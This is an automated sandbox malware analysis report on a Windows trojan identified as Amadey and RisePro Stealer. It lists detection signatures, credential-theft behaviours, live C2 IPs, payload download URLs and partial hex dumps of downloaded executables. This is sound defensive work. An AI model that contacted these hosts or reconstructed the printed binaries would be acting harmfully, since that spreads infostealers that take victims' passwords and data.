Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe
Analysis ID: 1425502
MD5: f70a70f653ae553a805fd21bc3092b13
SHA1: 095ff30abdfdeaa91018556ab4ec92566ad708d4
SHA256: 1ec09530c1153453b1bd0989af58808bc44e069c4608c878a64530bb08fa8840
Tags: exe
Infos:

Detection

Amadey, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RisePro Stealer
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://193.233.132.167/mine/amert.exeQ Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exeu Avira URL Cloud: Label: malware
Source: http://193.233.132.167/lend/alexxxxxxxx.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exeo Avira URL Cloud: Label: malware
Source: http://193.233.132.167/cost/random.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/cost/sarra.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exe5e67ee Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/random.exe5e67ee8 Avira URL Cloud: Label: malware
Source: http://193.233.132.167/mine/amert.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Found malware configuration
Source: 13.2.rundll32.exe.6e5b0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/ Virustotal: Detection: 18% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllh Virustotal: Detection: 15% Perma Link
Source: http://193.233.132.167/cost/random.exe Virustotal: Detection: 26% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.phpll32.dll Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.167/lend/alexxxxxxxx.exe Virustotal: Detection: 26% Perma Link
Source: http://193.233.132.167/cost/sarra.exe Virustotal: Detection: 26% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll Virustotal: Detection: 21% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1=1 Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.phpF Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.phpq8 Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.167/mine/random.exe Virustotal: Detection: 23% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.phpUsers Virustotal: Detection: 14% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.phpoded Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.phpmb3JtLXVybGVuY29kZWQ= Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1a Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.167/mine/amert.exe Virustotal: Detection: 26% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MPGPH131\MPGPH131.exe ReversingLabs: Detection: 42%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 47% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Virustotal: Detection: 78% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Virustotal: Detection: 47% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Virustotal: Detection: 62% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe Virustotal: Detection: 45% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Virustotal: Detection: 57% Perma Link
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe ReversingLabs: Detection: 47%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 13.2.rundll32.exe.6e5b0000.0.unpack String decryptor: 193.233.132.56
Source: 13.2.rundll32.exe.6e5b0000.0.unpack String decryptor: /Pneh2sXQk0/index.php
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.4:49737
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49741 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49742 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49743 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49745 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.4:49745
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49745 -> 147.45.47.93:58709
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.4:49746
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.4:49747
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49748 -> 193.233.132.56:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 193.233.132.56
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49745 -> 147.45.47.93:58709
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:05 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:06 GMTContent-Type: application/octet-streamContent-Length: 2256896Last-Modified: Sat, 13 Apr 2024 16:50:12 GMTConnection: keep-aliveETag: "661ab7c4-227000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b6 2a 19 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 ac 03 00 00 00 00 00 00 10 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 58 00 00 04 00 00 ac 52 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 4c e1 57 00 4c 00 00 00 6d 80 14 00 95 00 00 00 00 50 14 00 50 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c e1 57 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec e0 57 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 50 2e 00 00 00 50 14 00 00 0c 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 14 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 90 14 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6d 6d 69 71 77 62 64 00 10 19 00 00 00 3f 00 00 10 19 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 6e 6d 79 77 64 70 00 10 00 00 00 10 58 00 00 02 00 00 00 6e 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:09 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Apr 2024 18:21:12 GMTContent-Type: application/octet-streamContent-Length: 2263040Last-Modified: Sat, 13 Apr 2024 16:50:25 GMTConnection: keep-aliveETag: "661ab7d1-228800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 